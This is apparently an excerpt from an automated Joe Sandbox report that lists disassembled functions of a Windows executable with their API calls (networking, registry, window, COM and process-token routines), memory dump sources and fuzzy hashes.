Instruction Fuzzy Hash: 6AF0CD35543A12ABD7916F94EEC9BDA7A25BF06702F501016F102508B1C7B59575CF90

Function 00C31C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00C31DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C31DE1
WSAGetLastError.WSOCK32 ref: 00C31DF2
htons.WSOCK32(?,?,?,?,?), ref: 00C31EDB
inet_ntoa.WSOCK32(?), ref: 00C31E8C

Part of subcall function 00C139E8: _strlen.LIBCMT ref: 00C139F2

Part of subcall function 00C33224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00C2EC0C), ref: 00C33240

_strlen.LIBCMT ref: 00C31F35

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 2e5adde2bb83611e46a57046bc10efa9ef46e1ccfe2d6551bddfac8a22e9079d
Instruction ID: 5ed079399ab6f83b74a75a946b09605da11fd7addda761a1cb030cca1ac39c12
Opcode Fuzzy Hash: 2e5adde2bb83611e46a57046bc10efa9ef46e1ccfe2d6551bddfac8a22e9079d
Instruction Fuzzy Hash: 8DB1C130214340AFC324DF64C895F6A7BE5AF89318F58859CF8665B2E2DB71EE41CB91

Function 00BB5D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00BB5D30
GetWindowRect.USER32(?,?), ref: 00BB5D71
ScreenToClient.USER32(?,?), ref: 00BB5D99
GetClientRect.USER32(?,?), ref: 00BB5ED7
GetWindowRect.USER32(?,?), ref: 00BB5EF8

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 750392e45a829af6efae4200b1421bf1272c8fd261bb0ae919d73c5bb99d1c49
Instruction ID: b19120aef9db94e6da08c9ec93d5eaeff525eeba8f0aae2bf8e96e43b990374d
Opcode Fuzzy Hash: 750392e45a829af6efae4200b1421bf1272c8fd261bb0ae919d73c5bb99d1c49
Instruction Fuzzy Hash: 58B15538A00A4ADBDB20CFA8C4807FAB7F1FF48310F14855AE9A9D7250DB74EA51DB55

Function 00BE01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00BE00BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BE00D6
__allrem.LIBCMT ref: 00BE00ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BE010B
__allrem.LIBCMT ref: 00BE0122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BE0140

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: 160118b9ee8a84aac45e35bdc8f8ddf4ce34e2b074d8795d30aa982607da0962
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: 008107716017469BE720AF6ACC81B6BB3E9EF41324F2446BEF511DB381E7B0D9408795

Function 00BE61FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00BD82D9,00BD82D9,?,?,?,00BE644F,00000001,00000001,8BE85006), ref: 00BE6258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00BE644F,00000001,00000001,8BE85006,?,?,?), ref: 00BE62DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00BE63D8
__freea.LIBCMT ref: 00BE63E5

Part of subcall function 00BE3820: RtlAllocateHeap.NTDLL(00000000,?,00C81444,?,00BCFDF5,?,?,00BBA976,00000010,00C81440,00BB13FC,?,00BB13C6,?,00BB1129), ref: 00BE3852

__freea.LIBCMT ref: 00BE63EE
__freea.LIBCMT ref: 00BE6413

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 714e7f55b789803b47fc829dc464ce864725d7e3e8aad1f88eae6506d32e5b42
Instruction ID: 47a22418d947e61771dac801c1f360b83ce1684495dfe88607ff16b202d488fa
Opcode Fuzzy Hash: 714e7f55b789803b47fc829dc464ce864725d7e3e8aad1f88eae6506d32e5b42
Instruction Fuzzy Hash: C251E372600296ABDB258F6ACC81FBF77E9EB64790F1446A9FD05D7180EB34DC40C664

Function 00C3BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB9CB3: _wcslen.LIBCMT ref: 00BB9CBD

Part of subcall function 00C3C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C3B6AE,?,?), ref: 00C3C9B5
Part of subcall function 00C3C998: _wcslen.LIBCMT ref: 00C3C9F1
Part of subcall function 00C3C998: _wcslen.LIBCMT ref: 00C3CA68
Part of subcall function 00C3C998: _wcslen.LIBCMT ref: 00C3CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C3BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C3BD25
RegCloseKey.ADVAPI32(00000000), ref: 00C3BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C3BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C3BDF3
RegCloseKey.ADVAPI32(?), ref: 00C3BDFF

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: cc75bf7ac1b15d0485417b2e9ecaea3304e8629791867b692c88596f9b47d675
Instruction ID: 2cc13e1d8d6a93d283522122b4e4458d6276f1c721992fc3397f3581849ae029
Opcode Fuzzy Hash: cc75bf7ac1b15d0485417b2e9ecaea3304e8629791867b692c88596f9b47d675
Instruction Fuzzy Hash: B781B130218241EFC714DF24C891E6ABBE5FF84308F14859DF55A4B2A2DB31ED45CB92

Function 00C0F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 00C0F7B9
SysAllocString.OLEAUT32(00000001), ref: 00C0F860
VariantCopy.OLEAUT32(00C0FA64,00000000), ref: 00C0F889
VariantClear.OLEAUT32(00C0FA64), ref: 00C0F8AD
VariantCopy.OLEAUT32(00C0FA64,00000000), ref: 00C0F8B1
VariantClear.OLEAUT32(?), ref: 00C0F8BB

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 639fd0e0917b9418cebb79427d64f32135532628bdffc27295898b8e2ce515e7
Instruction ID: dc7955f991a5c4da7eb595dda7812d9652abc61a0698ff1bc696485ef2d72ad1
Opcode Fuzzy Hash: 639fd0e0917b9418cebb79427d64f32135532628bdffc27295898b8e2ce515e7
Instruction Fuzzy Hash: DC51E735600310BBCF34AB65D895B79B3E8EF45310B24946EE906DF6D1DB708C82D7A6

Function 00C2910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00BB7620: _wcslen.LIBCMT ref: 00BB7625

Part of subcall function 00BB6B57: _wcslen.LIBCMT ref: 00BB6B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 00C294E5
_wcslen.LIBCMT ref: 00C29506
_wcslen.LIBCMT ref: 00C2952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00C29585

Strings

X, xrefs: 00C29412

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: e5f20a613ca7222cf447e62cbd5f07a09ac686109858ff3d5dc615664283d726
Instruction ID: fc7bfac5e7f24e5a8c96209662e245a456cb22391e48edee0c03941e1963839e
Opcode Fuzzy Hash: e5f20a613ca7222cf447e62cbd5f07a09ac686109858ff3d5dc615664283d726
Instruction Fuzzy Hash: 6CE1A1316083109FD724DF24D881AAAB7E4FF85310F1489ADF8999B2A2DB71DD45CB92

Function 00BC920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00BC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BC9BB2

BeginPaint.USER32(?,?,?), ref: 00BC9241
GetWindowRect.USER32(?,?), ref: 00BC92A5
ScreenToClient.USER32(?,?), ref: 00BC92C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00BC92D3
EndPaint.USER32(?,?,?,?,?), ref: 00BC9321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00C071EA

Part of subcall function 00BC9339: BeginPath.GDI32(00000000), ref: 00BC9357

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 67c409740544a4ef90c2bfc87f29002edcd1b299ff3f4d3b0119be3902ad73bb
Instruction ID: e892a5540dc3e3816e3f62f792120e9a9e4cad3c0c12b7f2c041a938b911e5e0
Opcode Fuzzy Hash: 67c409740544a4ef90c2bfc87f29002edcd1b299ff3f4d3b0119be3902ad73bb
Instruction Fuzzy Hash: 18419D71105200AFE710DF24DCC8FAA7BE8FB46320F0406A9F9A4872F1C7319945DB61

Function 00C207EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00C2080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00C20847
EnterCriticalSection.KERNEL32(?), ref: 00C20863
LeaveCriticalSection.KERNEL32(?), ref: 00C208DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00C208F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00C20921

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 251306569a45494a810e228f8ef45fb33f71f44307429e921f12fa7bd405ce30
Instruction ID: bfabfbf2c03b4089db9c8ae7f076b08d45c1553735e14e577fe8866a89603a17
Opcode Fuzzy Hash: 251306569a45494a810e228f8ef45fb33f71f44307429e921f12fa7bd405ce30
Instruction Fuzzy Hash: D5416B71900206EBDF14AF54DC85B6EB7B9FF04300F1440A9ED04AA2A7DB70DE65DBA0

Function 00C481DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00C0F3AB,00000000,?,?,00000000,?,00C0682C,00000004,00000000,00000000), ref: 00C4824C
EnableWindow.USER32(00000000,00000000), ref: 00C48272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 00C482D1
ShowWindow.USER32(00000000,00000004), ref: 00C482E5
EnableWindow.USER32(00000000,00000001), ref: 00C4830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00C4832F

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 67c92c3505e4858c0a35c9dd85968e3695810c07c97c303b4a13053c3e2f83eb
Instruction ID: 40e60f7431494ccf4dc3f7a1405149e76928fb5dbd683deb992b78ca5e45f0d4
Opcode Fuzzy Hash: 67c92c3505e4858c0a35c9dd85968e3695810c07c97c303b4a13053c3e2f83eb
Instruction Fuzzy Hash: 8641A334601644EFDF21CF15C899BEC7BE0FB0A714F1852A9E9284B2B2CB71AD49CB54

Function 00C14C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00C14C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C14CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C14CEA
_wcslen.LIBCMT ref: 00C14D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C14D10
_wcsstr.LIBVCRUNTIME ref: 00C14D1A

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 0240e3d88d9d452b3df40ca9e1181803442f0dafe2325226c740e21a2dcb66c9
Instruction ID: 471ec23b432f162bbcddf9e549dfaf971211aaa7453dea457138ff52607e2caf
Opcode Fuzzy Hash: 0240e3d88d9d452b3df40ca9e1181803442f0dafe2325226c740e21a2dcb66c9
Instruction Fuzzy Hash: FC21F975205201BBEB196B39EC49FBF7BDDDF46750F10806DF805CA1A2EA61DD40A6A0

Function 00C2581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BB3A97,?,?,00BB2E7F,?,?,?,00000000), ref: 00BB3AC2

_wcslen.LIBCMT ref: 00C2587B
CoInitialize.OLE32(00000000), ref: 00C25995
CoCreateInstance.OLE32(00C4FCF8,00000000,00000001,00C4FB68,?), ref: 00C259AE
CoUninitialize.OLE32 ref: 00C259CC

Strings

.lnk, xrefs: 00C25876, 00C258C1, 00C25985

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 3ee924e4c21a5e5b5e74607b5cae3183356daca1a59780d7781562795b22e212
Instruction ID: aab8e7220295cc46bccec101afe67f052fcf9c30627a0bdd12bd13cef96a5537
Opcode Fuzzy Hash: 3ee924e4c21a5e5b5e74607b5cae3183356daca1a59780d7781562795b22e212
Instruction Fuzzy Hash: 68D161746086109FC714EF24D484A6BBBE1FF89710F14889DF89A9B361DB31ED46CB92

Function 00C1175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C10FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C10FCA
Part of subcall function 00C10FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C10FD6
Part of subcall function 00C10FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C10FE5
Part of subcall function 00C10FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C10FEC
Part of subcall function 00C10FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C11002

GetLengthSid.ADVAPI32(?,00000000,00C11335), ref: 00C117AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C117BA
HeapAlloc.KERNEL32(00000000), ref: 00C117C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 00C117DA
GetProcessHeap.KERNEL32(00000000,00000000,00C11335), ref: 00C117EE
HeapFree.KERNEL32(00000000), ref: 00C117F5

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: b02ab9481e9e547fdf1a7269d6f3a85bf06fdae4abc80da99687559786f6ac45
Instruction ID: ac9d1c58861dcd06beb1db92563c06604a3eb6f23bfd9ff8e470ea6e36d766b3
Opcode Fuzzy Hash: b02ab9481e9e547fdf1a7269d6f3a85bf06fdae4abc80da99687559786f6ac45
Instruction Fuzzy Hash: FA11BE35902205FFDB109FA4CC89BEE7BA9FB43355F184018F95197260C739AA80EBA0

Function 00C114CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C114FF
OpenProcessToken.ADVAPI32(00000000), ref: 00C11506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C11515
CloseHandle.KERNEL32(00000004), ref: 00C11520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C1154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00C11563

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 177fbacfc791e9b29ccaf1c8a70245b878761a39d8028ee5e1864ecb9c9bba76
Instruction ID: 41f4cd1166f1ad0acf3b66cb7639e3d7ef955c9b153f0155dde94d7d0e4fe7ec
Opcode Fuzzy Hash: 177fbacfc791e9b29ccaf1c8a70245b878761a39d8028ee5e1864ecb9c9bba76
Instruction Fuzzy Hash: AB115C76601209EBDF118F94DD49BDE7BA9FF4A714F084014FE15A2060C3798E60EB60

Function 00BD3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00BD3379,00BD2FE5), ref: 00BD3390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BD339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BD33B7
SetLastError.KERNEL32(00000000,?,00BD3379,00BD2FE5), ref: 00BD3409

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 5c96db53a4786165188b79bd6723985be3e9a7b7d619cf03748ef17325439075
Instruction ID: f3d1db033e507e886094902fb51dd89ad4023eb42373e7076794c17308b19774
Opcode Fuzzy Hash: 5c96db53a4786165188b79bd6723985be3e9a7b7d619cf03748ef17325439075
Instruction Fuzzy Hash: 1001F13260D312AEAB242BB46CC576AAAD4EB05B7932042AFF410803F2FF118D01958A

Function 00BE2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00BE5686,00BF3CD6,?,00000000,?,00BE5B6A,?,?,?,?,?,00BDE6D1,?,00C78A48), ref: 00BE2D78
_free.LIBCMT ref: 00BE2DAB
_free.LIBCMT ref: 00BE2DD3
SetLastError.KERNEL32(00000000,?,?,?,?,00BDE6D1,?,00C78A48,00000010,00BB4F4A,?,?,00000000,00BF3CD6), ref: 00BE2DE0
